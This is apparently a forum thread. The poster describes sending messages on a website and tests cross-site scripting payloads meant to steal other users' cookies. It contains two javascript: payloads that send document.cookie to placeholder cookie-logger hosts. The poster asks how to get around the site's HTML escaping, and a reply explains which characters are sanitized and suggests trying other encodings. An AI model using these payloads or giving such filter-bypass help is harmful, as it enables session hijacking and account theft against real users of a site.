Hi,

I can send messages to other people and it is shown in a div:

<div id="content">
<script>
<script type="text/javascript">
<h1 id="loadingContent" class="loadedHeaderContent" onclick="javascript:ajaxpage('/pages/messages_s.php?id=12');" onmouseout="this.style.color='#3c241a';" onmouseover="this.style.color='#D29257';">Read message</h1>
<div style="margin-top:30px; font-family:Palatino Linotype, Book Antiqua, Palatino, serif;">
<div class="notificationTop">
<div class="notificationMiddle" style="width:500px; _width:600px;">[[!!MESSAGE!!]]</div>
<div class="notificationBottom"></div>
</div>
</div>


where [[!!MESSAGE!!]] is the message I sent. If I try to send this message:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie=' document.cookie;">Click here!</a>

I can see in the source code the following:
&lt;a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie=' document.cookie;"&gt;Click here!&lt;/a&gt;

So that doesn't work.

But if I send this: javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

I can see in the source code this:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

So that means that the characters are not escaped. How can I bypass this filter with a link to a website?

Thanks!

Those specific characters may not be escaped, but the greater than and less than ">" "<" that you were using to create the href tag are being sanitized.

Your basically just placing your string in as text outside of tags.

Have you tried any other methods of encoding your string?